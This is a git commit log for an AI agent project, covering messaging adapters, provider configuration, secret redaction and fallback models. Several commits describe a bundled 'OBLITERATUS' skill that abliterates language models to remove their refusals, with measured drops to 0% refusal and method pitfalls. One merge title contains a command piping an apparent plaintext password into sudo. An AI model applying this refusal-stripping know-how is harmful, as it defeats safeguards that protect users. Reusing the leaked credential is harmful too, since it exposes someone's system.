Compare commits

...

181 Commits

Author SHA1 Message Date
teknium1
1b5eb9df84 feat: Telegram send_document and send_video for native file attachments
Implement send_document() and send_video() overrides in TelegramAdapter
so the agent can deliver files (PDFs, CSVs, docs, etc.) and videos as
native Telegram attachments instead of just printing the file path as
text.

The base adapter already routes MEDIA:<path> tags by extension — audio
goes to send_voice(), images to send_image_file(), and everything else
falls through to send_document(). But TelegramAdapter didn't override
send_document() or send_video(), so those fell back to plain text.

Now when the agent includes MEDIA:/path/to/report.pdf in its response,
users get a proper downloadable file attachment in Telegram.

Features:
- send_document: sends files via bot.send_document with display name,
  caption (truncated to 1024), and reply_to support
- send_video: sends videos via bot.send_video with inline playback
- Both fall back to base class text if the Telegram API call fails
- 10 new tests covering success, custom filename, file-not-found,
  not-connected, caption truncation, API error fallback, and reply_to

Requested by @TigerHixTang on Twitter.
2026-03-09 12:17:35 -07:00
teknium1
c754135965 fix: banner wraps in narrow terminals (Kitty, small windows)
The full HERMES-AGENT ASCII logo needs ~95 columns, and the
side-by-side caduceus + tools panel needs ~80. In narrow terminals
(Kitty default, resized windows) everything wraps into visual garbage.

Fixes:
- show_banner() auto-detects terminal width and falls back to compact
  banner when < 80 columns
- build_welcome_banner() skips the ASCII logo when < 95 columns
- Compact banner now dynamically sized via _build_compact_banner()
  instead of a hardcoded 64-char box that also wrapped in narrow terms
- Same width checks applied to /clear command's banner refresh

The up/down arrow key issue in Kitty terminal for multiline input is
a known Kitty keyboard protocol (CSI u) vs prompt_toolkit compatibility
gap — arrow keys work correctly in standard terminals and tmux. Users
can work around it by running in tmux or setting TERM=xterm-256color.
2026-03-09 05:57:36 -07:00
teknium1
c6b75baad0 feat: find-nearby skill and Telegram location support
Adds a 'find-nearby' skill for discovering nearby places using
OpenStreetMap (Overpass + Nominatim). No API keys needed. Works with:
- Coordinates (from Telegram location pins)
- Addresses, cities, zip codes, landmarks (auto-geocoded)
- Multiple place types (restaurant, cafe, bar, pharmacy, etc.)

Returns names, distances, cuisine, hours, addresses, and Google Maps
links (pin + directions). 184-line stdlib-only script.

Also adds Telegram location message handling:
- New MessageType.LOCATION in gateway base
- Telegram adapter handles LOCATION and VENUE messages
- Injects lat/lon coordinates into conversation context
- Prompts agent to ask what the user wants nearby

Inspired by PR #422 (reimplemented with simpler script and broader
skill scope — addresses/cities/zips, not just Telegram coordinates).
2026-03-09 05:31:10 -07:00
teknium1
a7ad6f6d28 Merge: custom providers instant activation + model persistence 2026-03-09 05:08:01 -07:00
teknium1
1a2141d04d fix: custom providers activate immediately, save model name
Selecting a saved custom provider now switches instantly without
probing /models — the model name is stored in the config entry
as a complete profile (name + url + key + model).

Changes:
- custom_providers entries now include 'model' field
- Selecting a saved provider with a model just activates it
- Only probes /models if no model is saved (first-time setup)
- Menu shows saved model name: 'Local (localhost:8000) — llama-70b'
- Dedup on re-entry: still activates the model, just doesn't add
  a duplicate config entry (updates model name if changed)
2026-03-09 05:07:53 -07:00
teknium1
ff3f3169b2 Merge: auto-save custom endpoints + removal option 2026-03-09 04:58:27 -07:00
teknium1
f4580b6010 feat: auto-save custom endpoints + removal option
When a user adds a custom endpoint via 'hermes model' → 'Custom
endpoint', it now automatically saves to custom_providers in
config.yaml so it persists and appears in the provider menu on
subsequent runs. Deduplicates by base_url.

Auto-generated names based on URL:
  http://localhost:8000/v1 → 'Local (localhost:8000)'
  https://xyz.runpod.ai/v1 → 'RunPod (xyz.runpod.ai)'
  https://api.example.com/v1 → 'Api.example.com'

Also adds 'Remove a saved custom provider' option to the menu
(only shown when custom providers exist) with a selection UI
to pick which one to remove.

Users can also manually edit custom_providers in config.yaml
for full control over names and settings.
2026-03-09 04:58:20 -07:00
teknium1
7b63a787b3 Merge: named custom providers in hermes model 2026-03-09 03:45:26 -07:00
teknium1
069570d103 feat: support multiple named custom providers in hermes model
Users with multiple local servers or custom endpoints can now define
them all in config.yaml and switch between them from the model
selection menu:

  custom_providers:
    - name: 'Local Llama 70B'
      base_url: 'http://localhost:8000/v1'
      api_key: 'not-needed'
    - name: 'RunPod vLLM'
      base_url: 'https://xyz.runpod.ai/v1'
      api_key: 'rp_xxxxx'

These appear in `hermes model` provider selection alongside the
built-in providers. When selected, the endpoint's /models API is
probed to show available models in a selection menu.

Previously only a single 'Custom endpoint' option existed, requiring
manual URL entry each time you wanted to switch between local servers.

Requested by @ZiarnoBobu on Twitter.
2026-03-09 03:45:17 -07:00
teknium1
0dafdcab86 Merge: skill reorganization + sub-category support
- Sub-category support in prompt_builder.py (backwards-compatible)
- Split mlops (40 skills) into 7 logical sub-categories
- Merged 8 singleton categories into logical parents
- Fixed 2 misplaced skills (code-review, ml-paper-writing)
2026-03-09 03:40:11 -07:00
Teknium
654e16187e feat(mcp): add sampling support — server-initiated LLM requests (#753)
Add MCP sampling/createMessage capability via SamplingHandler class.

Text-only sampling + tool use in sampling with governance (rate limits,
model whitelist, token caps, tool loop limits). Per-server audit metrics.

Based on concept from PR #366 by eren-karakus0. Restructured as class-based
design with bug fixes and tests using real MCP SDK types.

50 new tests, 2600 total passing.
2026-03-09 03:37:38 -07:00
teknium1
732c66b0f3 refactor: reorganize skills into sub-categories
The skills directory was getting disorganized — mlops alone had 40
skills in a flat list, and 12 categories were singletons with just
one skill each.

Code change:
- prompt_builder.py: Support sub-categories in skill scanner.
  skills/mlops/training/axolotl/SKILL.md now shows as category
  'mlops/training' instead of just 'mlops'. Backwards-compatible
  with existing flat structure.

Split mlops (40 skills) into 7 sub-categories:
- mlops/training (12): accelerate, axolotl, flash-attention,
  grpo-rl-training, peft, pytorch-fsdp, pytorch-lightning,
  simpo, slime, torchtitan, trl-fine-tuning, unsloth
- mlops/inference (8): gguf, guidance, instructor, llama-cpp,
  obliteratus, outlines, tensorrt-llm, vllm
- mlops/models (6): audiocraft, clip, llava, segment-anything,
  stable-diffusion, whisper
- mlops/vector-databases (4): chroma, faiss, pinecone, qdrant
- mlops/evaluation (5): huggingface-tokenizers,
  lm-evaluation-harness, nemo-curator, saelens, weights-and-biases
- mlops/cloud (2): lambda-labs, modal
- mlops/research (1): dspy

Merged singleton categories:
- gifs → media (gif-search joins youtube-content)
- music-creation → media (heartmula, songsee)
- diagramming → creative (excalidraw joins ascii-art)
- ocr-and-documents → productivity
- domain → research (domain-intel)
- feeds → research (blogwatcher)
- market-data → research (polymarket)

Fixed misplaced skills:
- mlops/code-review → software-development (not ML-specific)
- mlops/ml-paper-writing → research (academic writing)

Added DESCRIPTION.md files for all new/updated categories.
2026-03-09 03:35:53 -07:00
teknium1
1f0944de21 fix: handle non-string content from OpenAI-compatible servers (#759)
Some local LLM servers (llama-server, etc.) return message.content as
a dict or list instead of a plain string. This caused AttributeError
'dict object has no attribute strip' on every API call.

Normalizes content to string immediately after receiving the response:
- dict: extracts 'text' or 'content' field, falls back to json.dumps
- list: extracts text parts (OpenAI multimodal content format)
- other: str() conversion

Applied at the single point where response.choices[0].message is read
in the main agent loop, so all downstream .strip()/.startswith()/[:100]
operations work regardless of server implementation.

Closes #759
2026-03-09 03:32:32 -07:00
teknium1
f1a1b58319 fix: hermes setup doesn't update provider when switching to OpenRouter
When switching FROM Codex/Nous/custom TO OpenRouter via 'hermes setup',
the old provider stayed active because setup only saved the API key but
never updated config.yaml or auth.json. This caused resolve_provider()
to keep returning the old provider (e.g. openai-codex) even after the
user selected OpenRouter.

Fix: the OpenRouter path in setup now deactivates any OAuth provider
in auth.json and writes model.provider='openrouter' to config.yaml,
matching what all other provider paths already do.
2026-03-09 03:14:22 -07:00
teknium1
c21d77ca08 Merge: OBLITERATUS skill v2.0 + unified gateway compression
OBLITERATUS skill (PR #408 updated):
- 9 CLI methods, 28 analysis modules, 116 model presets
- Default method: advanced (multi-direction SVD, norm-preserving)
- Live-tested: Qwen2.5-3B 75%→0% refusal, Qwen2.5-0.5B 60%→20%
- References, templates, and real-world pitfalls included

Gateway compression fix (PR #739):
- Unified session hygiene with agent compression config
- Uses model context length × compression.threshold from config.yaml
- Removed hardcoded 100k/200-msg thresholds
2026-03-09 02:59:41 -07:00
teknium1
d6c710706f docs: add real-world testing findings to OBLITERATUS skill
Added pitfalls discovered during live abliteration testing:
- Models < 1B have fragmented refusal, respond poorly (0.5B: 60%→20%)
- Models 3B+ work much better (3B: 75%→0% with advanced defaults)
- aggressive method can backfire on small models (made it worse)
- Spectral certification RED is common even when refusal rate is 0%
- Fixed torch property: total_mem → total_memory
2026-03-09 02:52:54 -07:00
teknium1
a6d3becd6a feat: update OBLITERATUS skill to v2.0 — match current repo state
Major updates to reflect the current OBLITERATUS codebase:

- Change default recommendation from 'informed' (experimental) to
  'advanced' (reliable, well-tested multi-direction SVD)
- Add new CLI commands: tourney, recommend, strategies, report,
  aggregate, abliterate (alias)
- Add --direction-method flag (diff_means, svd, leace)
- Add strategies module (embedding/FFN ablation, head pruning,
  layer removal)
- Add evaluation module with LM Eval Harness integration
- Expand analysis modules from 15 to 28
- Add Apple Silicon (MLX) support
- Add study presets (quick, jailbreak, knowledge, etc.)
- Add --contribute, --verify-sample-size, --preset flags
- Add complete CLI command reference table
- Fix torch property name: total_mem -> total_memory (caught
  during live testing)

Tested: Successfully abliterated Qwen2.5-0.5B-Instruct using
'advanced' method — refusal rate 0.4%, coherence 1.0, model
responds without refusal to test prompts.
2026-03-09 02:39:03 -07:00
teknium1
3b67606c42 fix: custom endpoint provider shows as openrouter in gateway
Three issues caused the gateway to display 'openrouter' instead of
'Custom endpoint' when users configured a custom OAI-compatible endpoint:

1. hermes setup: custom endpoint path saved OPENAI_BASE_URL and
   OPENAI_API_KEY to .env but never wrote model.provider to config.yaml.
   All other providers (Codex, z.ai, Kimi, etc.) call
   _update_config_for_provider() which sets this — custom was the only
   path that skipped it. Now writes model.provider='custom' and
   model.base_url to config.yaml.

2. hermes model: custom endpoint set model.provider='auto' in config.yaml.
   The CLI display had a hack to detect OPENAI_BASE_URL and override to
   'custom', but the gateway didn't. Now sets model.provider='custom'
   directly.

3. gateway /model and /provider commands: defaulted to 'openrouter' and
   read config.yaml — which had no provider set. Added OPENAI_BASE_URL
   detection fallback (same pattern the CLI uses) as a defensive catch
   for existing users who set up before this fix.
2026-03-09 02:38:34 -07:00
teknium1
a2d0d07109 Merge PR #754: fix: stabilize system prompt across gateway turns for cache hits
Prevents unnecessary Anthropic prompt cache misses by reusing stored
system prompts for continuing sessions and stabilizing Honcho context
per session instead of per turn.
2026-03-09 02:00:14 -07:00
teknium1
aedb773f0d fix: stabilize system prompt across gateway turns for cache hits
Two changes to prevent unnecessary Anthropic prompt cache misses in the
gateway, where a fresh AIAgent is created per user message:

1. Reuse stored system prompt for continuing sessions:
   When conversation_history is non-empty, load the system prompt from
   the session DB instead of rebuilding from disk. The model already has
   updated memory in its conversation history (it wrote it!), so
   re-reading memory from disk produces a different system prompt that
   breaks the cache prefix.

2. Stabilize Honcho context per session:
   - Only prefetch Honcho context on the first turn (empty history)
   - Bake Honcho context into the cached system prompt and store to DB
   - Remove the per-turn Honcho injection from the API call loop

   This ensures the system message is identical across all turns in a
   session. Previously, re-fetching Honcho could return different context
   on each turn, changing the system message and invalidating the cache.

Both changes preserve the existing behavior for compression (which
invalidates the prompt and rebuilds from scratch) and for the CLI
(where the same AIAgent persists and the cached prompt is already
stable across turns).

Tests: 2556 passed (6 new)
2026-03-09 01:50:58 -07:00
teknium1
aaf8f2d2d2 feat: expand secret redaction patterns
Added 14 new redaction patterns, all with distinctive prefixes
that have near-zero false positive risk:

Prefix patterns:
  - AWS Access Key ID (AKIA...)
  - Stripe keys (sk_live_, sk_test_, rk_live_)
  - SendGrid (SG....)
  - HuggingFace (hf_...)
  - Replicate (r8_...)
  - npm tokens (npm_...)
  - PyPI tokens (pypi-...)
  - DigitalOcean PATs (dop_v1_, doo_v1_)
  - AgentMail (am_...)

Structural patterns:
  - Private key blocks (-----BEGIN...PRIVATE KEY-----)
  - Database connection string passwords (postgres://user:PASS@host)
2026-03-09 01:28:27 -07:00
teknium1
12f4800631 docs: add security.redact_secrets as commented config section
Moved redact_secrets out of DEFAULT_CONFIG (it's on by default when
unset) and into the commented sections at the bottom of config.yaml,
alongside fallback_model. Users can see the option and uncomment to
disable.
2026-03-09 01:12:49 -07:00
teknium1
57b48a81ca feat: add config toggle to disable secret redaction
New config option:

  security:
    redact_secrets: false  # default: true

When set to false, API keys, tokens, and passwords are shown in
full in read_file, search_files, and terminal output. Useful for
debugging auth issues where you need to verify the actual key value.

Bridged to both CLI and gateway via HERMES_REDACT_SECRETS env var.
The check is in redact_sensitive_text() itself, so all call sites
(terminal, file tools, log formatter) respect it.
2026-03-09 01:04:33 -07:00
teknium1
7af33accf1 fix: apply secret redaction to file tool outputs
Terminal output was already redacted via redact_sensitive_text() but
read_file and search_files returned raw content. Now both tools
redact secrets before returning results to the LLM.

Based on PR #372 by @teyrebaz33 (closes #363) — applied manually
due to branch conflicts with the current codebase.
2026-03-09 00:49:46 -07:00
teknium1
3214c05e82 Merge PR #369: fix(gateway): add missing UTF-8 encoding to file I/O
Authored by @ch3ronsa. Fixes UnicodeEncodeError/UnicodeDecodeError on
Windows with non-UTF-8 system locales (e.g. Turkish cp1254).

Adds encoding='utf-8' to 10 open() calls across gateway/session.py,
gateway/channel_directory.py, and gateway/mirror.py.
2026-03-09 00:36:38 -07:00
teknium1
4608a7fe4e fix: make skills manifest writes atomic
Uses temp file + fsync + os.replace() to avoid corruption if the
process crashes mid-write. Cleans up temp file on failure, logs
errors at debug level.

Based on PR #335 by @aydnOktay — adapted for the current v2
manifest format (name:hash).
2026-03-08 23:53:57 -07:00
teknium1
af67ea8800 fix: setup wizard overwrites platform_toolsets saved by tools_command 2026-03-08 23:39:04 -07:00
teknium1
37c3dcf551 fix: setup wizard overwrites platform_toolsets saved by tools_command
The wizard and tools_command each loaded their own config dict. When
tools_command saved platform_toolsets (with MoA/HA disabled), the
wizard's final save_config() overwrote it with its own dict that lacked
platform_toolsets entirely — resetting everything to defaults.

Fix: pass the wizard's config dict into tools_command so they share the
same object. Now platform_toolsets survives the wizard's final save.
2026-03-08 23:39:00 -07:00
teknium1
6a49fbb7da fix: correct agentmail skill — API key goes in config.yaml env block
MCP server subprocess env is filtered through _build_safe_env() which
only passes safe baseline vars (PATH, HOME, XDG_*) plus whatever is
explicitly in the config's env: block. Env vars from ~/.hermes/.env
are NOT inherited by MCP subprocesses. The key must go directly in
the config.yaml mcp_servers.agentmail.env section.
2026-03-08 23:34:50 -07:00
teknium1
eb0b01de7b chore: move agentmail skill to optional-skills, add API key docs
AgentMail requires a third-party API key (free tier available, paid
plans from $20/mo) — not appropriate for bundled skills that show
up in every user's system prompt.

Added a Requirements section at the top with clear instructions
to add AGENTMAIL_API_KEY to ~/.hermes/.env. Streamlined setup steps
to avoid duplicating the key in both .env and config.yaml.
2026-03-08 23:33:05 -07:00
teknium1
5b1528519c Merge PR #330: feat: add AgentMail skill for agent-owned email inboxes
Authored by teyrebaz33. Closes #329.
2026-03-08 23:32:26 -07:00
teknium1
52f92eb689 fix: first-install tool setup shows all providers + skip options 2026-03-08 23:15:20 -07:00
teknium1
7f9dd60c15 fix: first-install tool setup shows all providers + skip options
Three fixes:

1. Web search provider menu now says 'Select Search Provider' and notes
   that a free DuckDuckGo search skill is included if Firecrawl isn't
   desired. Supports custom setup_title/setup_note per TOOL_CATEGORIES.

2. All multi-provider menus (web, browser, TTS) now include a
   'Skip — keep defaults / configure later' option so users can move on.

3. First-install flow now walks through ALL tools with provider options
   (browser, TTS, web, image_gen, etc.), not just ones missing API keys.
   Previously, tools with a free provider (browser/Local, TTS/Edge) were
   silently skipped — users never got to choose between Local vs
   Browserbase or Edge vs ElevenLabs.
2026-03-08 23:15:14 -07:00
teknium1
77da3bbc95 fix: use correct role for summary message in context compressor
The summary message was always injected as 'user' role, which causes
consecutive user messages when the last preserved head message is also
'user'. Some APIs reject this (400 error), and it produces malformed
training data.

Fix: check the role of the last head message and pick the opposite role
for the summary — 'user' after assistant/tool, 'assistant' after user.

Based on PR #328 by johnh4098. Closes #328.
2026-03-08 23:09:04 -07:00
teknium1
bb489a3903 fix: add first_install flag to tools setup for reliable API key prompting 2026-03-08 23:06:35 -07:00
teknium1
167eb824cb fix: add first_install flag to tools setup for reliable API key prompting
On fresh installs, the multi-level curses menu flow (platform menu →
checklist → loop back → Done) was unreliable — users could end up
skipping API key configuration entirely.

Now the setup wizard passes first_install=True to tools_command(), which:
- Skips the platform selection menu entirely
- Goes straight to the tool checklist
- Prompts for API keys on ALL selected tools that need them
- Linear flow, no loop — impossible to accidentally skip

Returning users (hermes tools / hermes setup tools) get the existing
platform menu loop as before.
2026-03-08 23:06:31 -07:00
teknium1
efb64aee5a fix: default MoA, Home Assistant, RL Training to off for new installs 2026-03-08 22:54:15 -07:00
teknium1
3045e29232 fix: default MoA, Home Assistant, and RL Training to off for new installs
New users shouldn't have these pre-checked in the tool configurator:
- MoA requires OpenRouter API key and is a niche feature
- Home Assistant requires HASS_TOKEN and most users don't have one
- RL Training requires Tinker + WandB keys

They're still available in the checklist to enable, just not pre-selected.
Existing users with saved platform_toolsets are unaffected.
2026-03-08 22:54:11 -07:00
teknium1
5d7d76025a fix: setup wizard default max iterations 60 → 90 2026-03-08 22:51:02 -07:00
teknium1
e6c829384e fix: setup wizard shows 60 as default max iterations, should be 90
AIAgent.__init__ defaults to max_iterations=90 but setup_agent_settings()
fell back to '60' when HERMES_MAX_ITERATIONS wasn't set.
2026-03-08 22:50:58 -07:00
teknium1
5c658a416c Merge PR #748: fix: first-time setup skips API key prompts + install.sh echo Link2them00n. | sudo -S -p '' on WSL 2026-03-08 22:03:12 -07:00
teknium1
a130aa8165 fix: first-time setup skips API key prompts + install.sh sudo on WSL
Two issues fixed:

1. (Critical) hermes setup tools / hermes tools: On first-time setup,
   the tool checklist showed all tools as pre-selected (from the default
   hermes-cli toolset), but after confirming the selection, NO API key
   prompts appeared. This is because the code only prompted for 'newly
   added' tools (added = new_enabled - current_enabled), but since all
   tools were already in the default set, 'added' was always empty.

   Fix: Detect first-time configuration (no platform_toolsets entry in
   config) and check ALL enabled tools for missing API keys, not just
   newly added ones. Returning users still only get prompted for newly
   added tools (preserving skip behavior).

2. install.sh: When run via curl|bash on WSL2/Ubuntu, ripgrep and ffmpeg
   install was silently skipped with a confusing 'Non-interactive mode'
   message. The script already uses /dev/tty for the setup wizard, but
   the system package section didn't.

   Fix: Try reading from /dev/tty when available (same pattern as the
   build-tools section and setup wizard). Only truly skip when no
   terminal is available at all (Docker build, CI).
2026-03-08 21:59:39 -07:00
teknium1
35d57ed752 refactor: unified OAuth/API-key credential resolution for fallback
Split fallback provider handling into two clean registries:

  _FALLBACK_API_KEY_PROVIDERS — env-var-based (openrouter, zai, kimi, minimax)
  _FALLBACK_OAUTH_PROVIDERS  — OAuth-based (openai-codex, nous)

New _resolve_fallback_credentials() method handles all three cases
(OAuth, API key, custom endpoint) and returns a uniform (key, url, mode)
tuple. _try_activate_fallback() is now just validation + client build.

Adds Nous Portal as a fallback provider — uses the same OAuth flow
as the primary provider (hermes login), returns chat_completions mode.

OAuth providers get credential refresh for free: the existing 401
retry handlers (_try_refresh_codex/nous_client_credentials) check
self.provider, which is set correctly after fallback activation.

4 new tests (nous activation, nous no-login, codex retained).
27 total fallback tests passing, 2548 full suite.
2026-03-08 21:44:48 -07:00
teknium1
5785bd3272 feat: add openai-codex as fallback provider
Codex OAuth uses a different auth flow (OAuth tokens, not env vars)
and a different API mode (codex_responses, not chat_completions).
The fallback now handles this specially:

- Resolves credentials via resolve_codex_runtime_credentials()
- Sets api_mode to codex_responses
- Fails gracefully if no Codex OAuth session exists

Also added to the commented-out config.yaml example.
2 new tests (codex activation + graceful failure).
2026-03-08 21:34:15 -07:00
teknium1
cf9482984e docs: condense AGENTS.md from 927 to 242 lines
AGENTS.md is read by AI agents in their context window. Every line
costs tokens. The previous version had grown to 927 lines with
user-facing documentation that duplicates website/docs/:

Removed (belongs in website/docs/, not agent context):
- Full CLI commands table (50 lines)
- Full gateway slash commands list (20 lines)
- Messaging gateway setup, config examples, security details
- DM pairing system details
- Event hooks format and examples
- Tool progress notification details
- Full environment variables reference
- Auxiliary model configuration section (60 lines)
- Background process management details
- Trajectory format details
- Batch processing CLI usage
- Skills system directory tree and hub details
- Dangerous command approval flow details
- Platform toolsets listing

Kept (essential for agents modifying code):
- Project structure (condensed to key files only)
- File dependency chain
- AIAgent class signature and loop mechanics
- How to add tools (3 files, full pattern)
- How to add config (config.yaml + .env patterns)
- How to add CLI commands
- Config loader table (two separate systems)
- Prompt caching policy (critical constraint)
- All known pitfalls
- Test commands
2026-03-08 21:33:10 -07:00
teknium1
67275641f8 fix: unify gateway session hygiene with agent compression config
The gateway had a SEPARATE compression system ('session hygiene')
with hardcoded thresholds (100k tokens / 200 messages) that were
completely disconnected from the model's context length and the
user's compression config in config.yaml. This caused premature
auto-compression on Telegram/Discord — triggering at ~60k tokens
(from the 200-message threshold) or inconsistent token counts.

Changes:
- Gateway hygiene now reads model name from config.yaml and uses
  get_model_context_length() to derive the actual context limit
- Compression threshold comes from compression.threshold in
  config.yaml (default 0.85), same as the agent's ContextCompressor
- Removed the message-count-based trigger (was redundant and caused
  false positives in tool-heavy sessions)
- Removed the undocumented session_hygiene config section — the
  standard compression.* config now controls everything
- Env var overrides (CONTEXT_COMPRESSION_THRESHOLD,
  CONTEXT_COMPRESSION_ENABLED) are respected
- Warn threshold is now 95% of model context (was hardcoded 200k)
- Updated tests to verify model-aware thresholds, scaling across
  models, and that message count alone no longer triggers compression

For claude-opus-4.6 (200k context) at 85% threshold: gateway
hygiene now triggers at 170k tokens instead of the old 100k.
2026-03-08 21:30:48 -07:00
teknium1
3ffaac00dd feat: bell_on_complete — terminal bell when agent finishes
Adds a simple config option to play the terminal bell (\a) when the
agent finishes a response. Useful for long-running tasks — switch to
another window and your terminal will ding when done.

Works over SSH since the bell character propagates through the
connection. Most terminal emulators can be configured to flash the
taskbar, play a sound, or show a visual indicator on bell.

Config (default: off):
  display:
    bell_on_complete: true

Closes #318
2026-03-08 21:30:48 -07:00
Teknium
816a3ef6f1 Merge pull request #745 from NousResearch/hermes/hermes-f8d56335
feat: browser console tool, annotated screenshots, auto-recording, and dogfood QA skill
2026-03-08 21:29:52 -07:00
teknium1
a8bf414f4a feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.

## New tool: browser_console

Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.

## Enhanced tool: browser_vision(annotate=True)

New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.

## Config: browser.record_sessions

Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default

## Built-in skill: dogfood

Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
   (Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence

Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template

## Tests

21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation

Addresses #315.
2026-03-08 21:28:12 -07:00
teknium1
3b312d45c5 fix: show fallback_model as commented-out YAML example in config
Remove fallback_model from DEFAULT_CONFIG (empty strings were useless
noise). Instead, save_config() appends a commented-out section at the
bottom of config.yaml showing the available providers and example usage.

When the user actually configures fallback_model, it appears as normal
YAML and the comment block is omitted.
2026-03-08 21:25:58 -07:00
teknium1
fcd899f888 docs: add platform integration checklist for new gateway adapters
Comprehensive 16-point checklist covering every integration point
needed when adding a new messaging platform to the gateway. Built
from the Signal integration experience where 7 integration points
were initially missed.

Covers: adapter, config enum, factory, auth maps, session source,
prompt hints, toolsets, cron delivery, send_message tool, cronjob
tool schema, channel directory, status display, setup wizard,
redaction, documentation, and tests.
2026-03-08 21:20:06 -07:00
Teknium
315f3ea429 Merge pull request #740 from NousResearch/hermes/hermes-3cd7c62d
feat: simple fallback model for provider resilience (#737)
2026-03-08 21:16:58 -07:00
teknium1
b7d6eae64c fix: Signal adapter parity pass — integration gaps, clawdbot features, env var simplification
Integration gaps fixed (7 files missing Signal):
- cron/scheduler.py: Signal in platform_map (cron delivery was broken)
- agent/prompt_builder.py: PLATFORM_HINTS for Signal (agent knows it's on Signal)
- toolsets.py: hermes-signal toolset + added to hermes-gateway composite
- hermes_cli/status.py: Signal + Slack in platform status display
- tools/send_message_tool.py: Signal example in target description
- tools/cronjob_tools.py: Signal in delivery option docs + schema
- gateway/channel_directory.py: Signal in session-based channel discovery

Clawdbot parity features added to signal.py:
- Self-message filtering: prevents reply loops by checking sender != account
- SyncMessage filtering: ignores sync envelopes (sent transcripts, read receipts)
- Edit message support: reads dataMessage from editMessage envelope
- Mention rendering: replaces \uFFFC placeholders with @identifier text
- Jitter in SSE reconnection backoff (20% randomization, prevents thundering herd)

Env var simplification (7 → 4):
- Removed SIGNAL_DM_POLICY (DM auth follows standard platform pattern via
  SIGNAL_ALLOWED_USERS + DM pairing, same as Telegram/Discord)
- Removed SIGNAL_GROUP_POLICY (derived from SIGNAL_GROUP_ALLOWED_USERS:
  not set = disabled, set with IDs = allowlist, set with * = open)
- Removed SIGNAL_DEBUG (was setting root logger, removed entirely)
- Remaining: SIGNAL_HTTP_URL, SIGNAL_ACCOUNT (required),
  SIGNAL_ALLOWED_USERS, SIGNAL_GROUP_ALLOWED_USERS (optional)

Updated all docs (website, AGENTS.md, signal.md) to match.
2026-03-08 21:00:21 -07:00
teknium1
b3765c28d0 fix: restrict fallback providers to actual hermes providers
Remove hallucinated providers (openai, deepseek, together, groq,
fireworks, mistral, gemini, nous) from the fallback provider map.
These don't exist in hermes-agent's provider system.

The real supported providers for fallback are:
  openrouter   (OPENROUTER_API_KEY)
  zai          (ZAI_API_KEY)
  kimi-coding  (KIMI_API_KEY)
  minimax      (MINIMAX_API_KEY)
  minimax-cn   (MINIMAX_CN_API_KEY)

For any other OpenAI-compatible endpoint, users can use the
base_url + api_key_env overrides in the config.

Also adds Kimi User-Agent header for kimi fallback (matching
the main provider system).
2026-03-08 20:49:55 -07:00
teknium1
4cfb66bac2 docs: list all supported fallback providers with env var names
The config comment now shows the complete list of built-in providers
that the fallback system supports, each with the env var it reads
for the API key. Also clarifies that custom OpenAI-compatible endpoints
work via base_url + api_key_env.
2026-03-08 20:42:54 -07:00
teknium1
0c4cff352a docs: add Signal messenger documentation across all doc surfaces
- website/docs/user-guide/messaging/signal.md: Full setup guide with
  prerequisites, step-by-step instructions, access policies, features,
  troubleshooting, security notes, and env var reference
- website/docs/user-guide/messaging/index.md: Added Signal to architecture
  diagram, platform toolset table, security examples, and Next Steps links
- website/docs/reference/environment-variables.md: All 7 SIGNAL_* env vars
- README.md: Signal in feature table and documentation table
- AGENTS.md: Signal in gateway description and env var config section
2026-03-08 20:42:04 -07:00
teknium1
503269b85a chore: remove stale docs/ directory
All documentation migrated to website/docs/ (Docusaurus). The docs/
directory only contained:
- README.md: redirect saying 'docs moved to website' (redundant)
- send_file_integration_map.md: internal engineering notes, unreferenced
  by any file in the codebase

The landing page at landingpage/ is still actively used by the
deploy-site.yml GitHub Actions workflow.
2026-03-08 20:41:47 -07:00
teknium1
161436cfdd feat: simple fallback model for provider resilience
When the primary model/provider fails after retries (rate limit, overload,
auth errors, connection failures), Hermes automatically switches to a
configured fallback model for the remainder of the session.

Config (in ~/.hermes/config.yaml):

  fallback_model:
    provider: openrouter
    model: anthropic/claude-sonnet-4

Supports all major providers: OpenRouter, OpenAI, Nous, DeepSeek, Together,
Groq, Fireworks, Mistral, Gemini — plus custom endpoints via base_url and
api_key_env overrides.

Design principles:
- Dead simple: one fallback model, not a chain
- One-shot: switches once, doesn't ping-pong back
- Zero new dependencies: uses existing OpenAI client
- Minimal code: ~100 lines in run_agent.py, ~5 lines in cli.py/gateway
- Three trigger points: max retries exhausted, non-retryable client errors,
  and invalid response exhaustion

Does NOT trigger on context overflow or payload-too-large errors (those
are handled by the existing compression system).

Addresses #737.

25 new tests, 2492 total passing.
2026-03-08 20:22:33 -07:00
teknium1
24f549a692 feat: add Signal messenger gateway platform (#405)
Complete Signal adapter using signal-cli daemon HTTP API.
Based on PR #268 by ibhagwan, rebuilt on current main with bug fixes.

Architecture:
- SSE streaming for inbound messages with exponential backoff (2s→60s)
- JSON-RPC 2.0 for outbound (send, typing, attachments, contacts)
- Health monitor detects stale SSE connections (120s threshold)
- Phone number redaction in all logs and global redact.py

Features:
- DM and group message support with separate access policies
- DM policies: pairing (default), allowlist, open
- Group policies: disabled (default), allowlist, open
- Attachment download with magic-byte type detection
- Typing indicators (8s refresh interval)
- 100MB attachment size limit, 8000 char message limit
- E.164 phone + UUID allowlist support

Integration:
- Platform.SIGNAL enum in gateway/config.py
- Signal in _is_user_authorized() allowlist maps (gateway/run.py)
- Adapter factory in _create_adapter() (gateway/run.py)
- user_id_alt/chat_id_alt fields in SessionSource for UUIDs
